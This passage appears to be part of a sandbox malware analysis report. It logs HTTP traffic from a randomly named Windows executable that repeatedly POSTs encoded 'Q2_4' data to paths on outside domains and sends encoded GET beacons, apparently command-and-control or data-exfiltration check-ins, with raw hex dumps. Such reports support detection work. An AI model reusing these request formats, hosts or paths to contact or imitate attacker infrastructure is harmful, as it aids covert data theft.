                                                                                                              Nov 5, 2024 15:37:31.932573080 CET1289INData Raw: 82 fb b3 cf 7f e0 7f fa 39 a4 2f a3 95 97 81 02 f6 a9 7f 86 d0 45 e9 c1 e7 6a ed 7f 34 77 b7 d1 80 dc 22 65 55 69 2f 7c e1 52 08 a3 b3 f1 80 d9 9c fc 4b ab ce 3f 8d c3 39 80 8f 1f 16 f0 7d e4 fa cb 1f ff e8 93 01 b7 bc 5e 78 c7 03 7b b1 08 7c 87
                                                                                                              Data Ascii: 9/Ej4w"eUi/|RK?9}^x{||q] ?za Wp;d@i: : .a4fx<)8?8tA^y2JXHLBap3rf/@3;t|=xo`.#eu97S


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              52192.168.11.204979366.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:34.131946087 CET1289OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6e 4f 77 5a 68 68 51 39 49 38 49 30 74 46 73 2b 31 4f 33 71 65 36 6b 48 58 72 6d 55 4b 73 4d 6f 61 6b 57 4b 73 65 75 6a 5a 6f 68 4a 79 64 4e 32 43 49 7a 77 6a 55 35 68 39 41 55 69 6a 67 4a 48 44 35 6a 37 52 39 6f 35 4b 47 72 48 59 51 53 62 37 41 68 47 6f 71 37 76 78 76 7a 76 4b 75 4a 62 54 4d 7a 31 61 51 33 53 41 61 58 38 37 31 79 4d 35 50 6a 2b 35 4a 67 54 66 30 4a 48 73 74 6a 54 78 52 65 37 56 76 4c 36 41 43 70 68 2f 33 69 2b 6d 68 4b 2b 43 39 5a 59 63 4c 68 65 56 64 68 51 42 6a 7a 41 44 4a 54 2b 51 56 55 45 65 32 52 30 75 63 6f 5a 44 4a 65 73 48 50 32 43 2f 64 65 4f 32 58 76 4c 4e 46 58 43 55 4d 2f 2b 53 6b 71 75 6c 4a 62 39 45 50 78 48 2b 31 50 4d 39 4e 5a 6e 70 42 52 34 68 7a 6c 6e 32 54 68 4b 61 78 67 69 76 48 41 4a 33 36 4d 47 68 74 6a 39 4b 6b 39 6d 48 4b 42 47 4e 70 37 44 6e 4d 46 63 4b 69 41 77 62 4c 6a 41 32 6b 2b 6c 6b 67 7a 64 39 46 57 54 4d 58 45 59 54 53 77 74 78 32 4d 4d 6a 6b 48 52 74 38 30 2f 33 6d 51 4d 59 2f 59 63 45 39 57 74 65 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCnOwZhhQ9I8I0tFs+1O3qe6kHXrmUKsMoakWKseujZohJydN2CIzwjU5h9AUijgJHD5j7R9o5KGrHYQSb7AhGoq7vxvzvKuJbTMz1aQ3SAaX871yM5Pj+5JgTf0JHstjTxRe7VvL6ACph/3i+mhK+C9ZYcLheVdhQBjzADJT+QVUEe2R0ucoZDJesHP2C/deO2XvLNFXCUM/+SkqulJb9EPxH+1PM9NZnpBR4hzln2ThKaxgivHAJ36MGhtj9Kk9mHKBGNp7DnMFcKiAwbLjA2k+lkgzd9FWTMXEYTSwtx2MMjkHRt80/3mQMY/YcE9Wte4wbKgG5GSql0Ty05B7Soh5vwKQiqemm+S/3WfNONNSQuk04psmg1TaEVQX8ifDPN3B38v4IIxOiDyC5vXy6cf5OPz8ZBGa1soT/bWDCbAo8HocSKO4oe9MUGdT1ZjlNbivsqrdbT8m0zGb5OS4cGimNNx6Zcx1QfBJJ6C7L5g8QDx0yyQewP4XUDjxg7vZVzBme5cSxojoIPdjZC9KXrQ7eh0Bi2x7WwlJ9+soI6/Lc0ybIL93SwG9jGtYvj3ufuZuflaqU0d9eVvA9XzpmMZ6yanWouaZR4TOTuQV8/7fjwhJSuHegayycqzMJErNiTGWWxX6eMd4W3k6JY2L3XKVxl6ryHYLhguUdf6BfVu07/svRNNhLnwS4I4SP1nKb7KtaBqSt8/XisCD
                                                                                                              Nov 5, 2024 15:37:34.131995916 CET1289OUTData Raw: 48 70 63 67 53 38 74 54 44 58 55 36 30 4a 36 57 79 63 57 77 47 4a 43 63 39 45 76 5a 38 6e 54 6b 52 50 47 79 54 48 2b 43 64 39 59 44 41 59 59 41 4b 37 56 38 78 55 68 6e 76 6f 2b 63 79 64 35 44 6f 33 35 53 69 7a 6f 44 73 6d 51 64 30 50 6a 6a 6a 69
                                                                                                              Data Ascii: HpcgS8tTDXU60J6WycWwGJCc9EvZ8nTkRPGyTH+Cd9YDAYYAK7V8xUhnvo+cyd5Do35SizoDsmQd0PjjjiUgkFpit6q3fTRLNN8YU+8SeRJNE/QZFh1VzYQnaJAuRX1Zxb7W4Z5/C3mYBtNJkfl6uATJCwEVVTLU439BsGdfTfAb0N2Ah8EIS8EA8+YkTQIfePrFow54P7WObVO49ZQ1ZVBFcbvODr2Z4mAYy1tyhDqmYMsMFlc
                                                                                                              Nov 5, 2024 15:37:34.132045031 CET5344OUTData Raw: 4e 33 64 6d 56 52 44 69 77 51 2b 71 48 39 70 4d 70 58 62 33 75 4d 42 68 70 65 57 4d 6f 57 55 44 78 67 65 71 2b 53 63 5a 50 5a 2f 46 68 63 31 76 52 45 52 51 6a 71 48 62 62 34 53 2f 77 33 33 73 6f 79 52 78 30 57 4f 6b 77 6d 35 74 50 4e 52 34 5a 53
                                                                                                              Data Ascii: N3dmVRDiwQ+qH9pMpXb3uMBhpeWMoWUDxgeq+ScZPZ/Fhc1vRERQjqHbb4S/w33soyRx0WOkwm5tPNR4ZS2WD3wwGpsuruC7cZtO5Ck16kwO9ocPUA+k+hRkc0AeiQkvuRsbnoF8LmsYlOBvMPcB3/ehTYhm3YpNJDJUC/hFI4U7f3LKTv/dj6fNx/Elg9ptmrGcAEHAZoid9RWyBPuaOZ54SYN57tJqoxVCWcTUeThGMKWkOjl
                                                                                                              Nov 5, 2024 15:37:34.472951889 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:34 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:37:34.472965956 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:37:34.472973108 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:37:34.473000050 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:37:34.473031998 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:37:34.473057032 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:37:34.473088980 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:37:34.473095894 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:37:34.473103046 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              53192.168.11.204979466.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:36.785660982 CET466OUTGET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:37.051381111 CET618INHTTP/1.1 301 Moved Permanently
                                                                                                              Date: Tue, 05 Nov 2024 14:37:36 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Location: http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              54192.168.11.20497953.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:42.183583021 CET729OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 79 2b 70 37 2b 66 39 67 47 72 45 71 4d 70 38 65 42 55 59 67 78 6b 36 48 63 44 67 44 59 78 59 52 69 2f 41 76 39 74 5a 2f 47 4c 57 66 4a 76 72 78 59 35 53 4c 2f 72 73 6f 66 75 4a 38 50 47 6c 69 61 4c 33 4d 4c 69 46 6e 6f 2f 70 44 69 71 30 59 6c 32 78 30 63 45 71 48 30 76 51 4e 55 65 4a 51 34 41 63 51 37 56 6b 66 43 34 57 42 30 31 41 53 70 59 41 65 35 76 52 34 57 56 78 64 70 6e 55 53 5a 42 6a 45 6e 68 34 48 54 47 51 79 78 6b 38 62 63 62 33 6d 46 4d 45 34 6a 34 55 54 56 78 51 2b 54 53 56 79 52 78 32 66 49 58 6b 6c 50 35 57 78 66 48 48 52 69 51 3d 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE1y+p7+f9gGrEqMp8eBUYgxk6HcDgDYxYRi/Av9tZ/GLWfJvrxY5SL/rsofuJ8PGliaL3MLiFno/pDiq0Yl2x0cEqH0vQNUeJQ4AcQ7VkfC4WB01ASpYAe5vR4WVxdpnUSZBjEnh4HTGQyxk8bcb3mFME4j4UTVxQ+TSVyRx2fIXklP5WxfHHRiQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              55192.168.11.20497963.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:44.823009014 CET749OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 30 75 35 37 38 38 56 67 41 4c 45 70 51 35 38 65 61 45 59 6b 78 6a 79 48 63 43 6c 49 5a 44 4d 52 69 61 6b 76 2b 73 5a 2f 42 4c 57 66 43 50 72 4f 58 5a 53 55 2f 72 67 67 66 75 46 38 50 43 46 69 61 4c 6e 4d 4c 52 64 6d 70 76 70 42 36 61 30 61 34 6d 78 30 63 45 71 48 30 76 30 6e 55 66 68 51 2f 77 41 51 36 30 6b 51 63 49 58 7a 31 31 41 53 74 59 41 61 35 76 52 61 57 55 74 33 70 6b 73 53 5a 44 37 45 6d 77 34 47 49 57 51 34 2f 45 39 48 56 5a 61 35 44 63 73 2b 69 37 6b 72 64 67 4e 45 66 6b 45 6f 4d 44 43 37 4c 45 34 58 4c 4a 76 5a 64 46 47 4b 2f 5a 42 5a 37 63 46 78 4e 6c 6e 62 45 35 73 31 59 48 4f 5a 76 79 49 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDMRiakv+sZ/BLWfCPrOXZSU/rggfuF8PCFiaLnMLRdmpvpB6a0a4mx0cEqH0v0nUfhQ/wAQ60kQcIXz11AStYAa5vRaWUt3pksSZD7Emw4GIWQ4/E9HVZa5Dcs+i7krdgNEfkEoMDC7LE4XLJvZdFGK/ZBZ7cFxNlnbE5s1YHOZvyI=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              56192.168.11.20497973.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:47.462866068 CET1289OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 30 75 35 37 38 38 56 67 41 4c 45 70 51 35 38 65 61 45 59 6b 78 6a 79 48 63 43 6c 49 5a 44 55 52 68 6f 73 76 35 2f 78 2f 41 4c 57 66 42 50 72 50 58 5a 54 4f 2f 72 6f 6b 66 75 35 4b 50 41 39 69 56 49 66 4d 43 45 78 6d 6a 76 70 42 7a 36 30 5a 6c 32 77 70 63 46 61 4c 30 76 45 6e 55 66 68 51 2f 79 30 51 39 6c 6b 51 65 49 57 42 30 31 41 57 70 59 41 69 35 76 34 6c 57 55 70 4e 70 56 4d 53 59 6a 72 45 72 6d 4d 47 56 47 51 2b 34 45 39 50 56 5a 57 63 44 63 67 44 69 36 41 42 64 69 74 45 4d 41 52 53 49 68 2b 2b 66 46 6b 58 48 72 79 67 64 44 71 6f 39 75 52 74 30 4f 35 46 48 7a 6e 38 4d 62 31 36 4b 55 4f 59 7a 31 6e 2b 6f 37 57 67 53 4c 46 48 63 6c 2b 61 39 63 4f 33 6f 35 65 42 6d 6d 55 35 52 6a 57 43 30 4d 63 51 6d 65 7a 46 68 6d 32 4b 6c 67 31 74 54 56 64 57 59 4c 6d 4a 75 78 31 6f 69 47 5a 51 58 4d 75 72 74 7a 54 61 52 46 50 4a 41 52 4f 39 6f 6a 2b 6d 50 55 48 6e 70 4c 37 5a 63 42 54 30 43 57 6a 63 74 2f 73 62 49 6a 35 6b 39 32 76 6b 6f 4c 72 53 68 43 33 32 68 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDURhosv5/x/ALWfBPrPXZTO/rokfu5KPA9iVIfMCExmjvpBz60Zl2wpcFaL0vEnUfhQ/y0Q9lkQeIWB01AWpYAi5v4lWUpNpVMSYjrErmMGVGQ+4E9PVZWcDcgDi6ABditEMARSIh++fFkXHrygdDqo9uRt0O5FHzn8Mb16KUOYz1n+o7WgSLFHcl+a9cO3o5eBmmU5RjWC0McQmezFhm2Klg1tTVdWYLmJux1oiGZQXMurtzTaRFPJARO9oj+mPUHnpL7ZcBT0CWjct/sbIj5k92vkoLrShC32hZzJ183Ii7vu4nulWjCGtdsCHYotN4lWcr3E0Eay+javm8HPlk7D4Gjieo0ZR3NiRo0dlkN8BYVxaiE7VZ8F2AiIP05Q/nZPcnnHfskKqQ2algDMeazv9kn3yDr7lf+hsIafZ5XhANiR8uV7CQzYfDnCsAMRB+G1kEMtr/CwEW+WyJa6FgSq2IivxwA37mhIQ5vYeOChgNwSbh2Rq11H/g68DvdiWOQSa3mfWiX93WP3toGJA1TQrOtBI+MEC/j+k7VeGAZJNBBl6jKtsmQvjcWxQ5Zthdhosl7vEa3DDZPepupvHn+mkMuGRKaw/9IO923kJf6Ui+fqOcELsENmTH7gTPQlUSH7e1kYM0fMfrnRe7wRozN4bBgR2B5RlAK1f5tFWIXI6EwFcdT3Ev9b/RyStsYIcJgfgrXBfvy
                                                                                                              Nov 5, 2024 15:37:47.462914944 CET1289OUTData Raw: 58 6e 33 4c 61 54 67 6c 31 44 63 75 7a 51 52 75 4d 6c 6c 69 77 44 66 55 67 2f 38 33 52 42 67 6e 76 4e 6b 78 39 72 63 2b 61 6a 53 4e 6d 58 47 43 39 62 74 64 52 7a 62 6d 57 6a 63 63 51 74 31 59 56 55 43 66 73 42 79 62 2b 65 47 54 59 30 68 69 49 75
                                                                                                              Data Ascii: Xn3LaTgl1DcuzQRuMlliwDfUg/83RBgnvNkx9rc+ajSNmXGC9btdRzbmWjccQt1YVUCfsByb+eGTY0hiIup/fb2qF87myWCv8pO7ZvAsN274rtD0zYFno2EIyid1OQiD+rid4ivrUqITs1FowAuj2uq391VHOxCrx30+j9xP048KXXitPI6oZdOIWhTtre4LlS/iLmbaa+aRvjy8/AGplhu0F0A60U7nt5BqreK2/EFb7F7EZGb
                                                                                                              Nov 5, 2024 15:37:47.462968111 CET5320OUTData Raw: 37 48 57 47 71 32 76 44 56 35 4d 52 47 45 6c 34 58 34 30 69 2f 72 37 39 6b 4c 5a 52 49 5a 32 49 4b 33 50 58 49 69 43 41 53 36 51 36 75 39 4f 39 73 63 54 4c 45 32 35 49 6f 6f 77 4b 31 4a 32 63 55 51 36 73 30 65 35 4a 67 37 59 64 72 47 6c 64 76 6a
                                                                                                              Data Ascii: 7HWGq2vDV5MRGEl4X40i/r79kLZRIZ2IK3PXIiCAS6Q6u9O9scTLE25IoowK1J2cUQ6s0e5Jg7YdrGldvjeHS4Qzd5FswqiUSX5QCid/p4BEJk/Cs0bsA3CebB0ES2lQAiiXFd7G3o2DRFC81YJpnM50IOT4zJ6dK1DiBFi44eNj1W9apGate/XKzoiWG3+iHPpW7CmtXkvh4wwvkV+2yADBYihe4IVU3u6flSa+yvXN4sz0Ree


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              57192.168.11.20497983.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:50.102979898 CET458OUTGET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.godskids.store
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:50.213927031 CET389INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:37:50 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
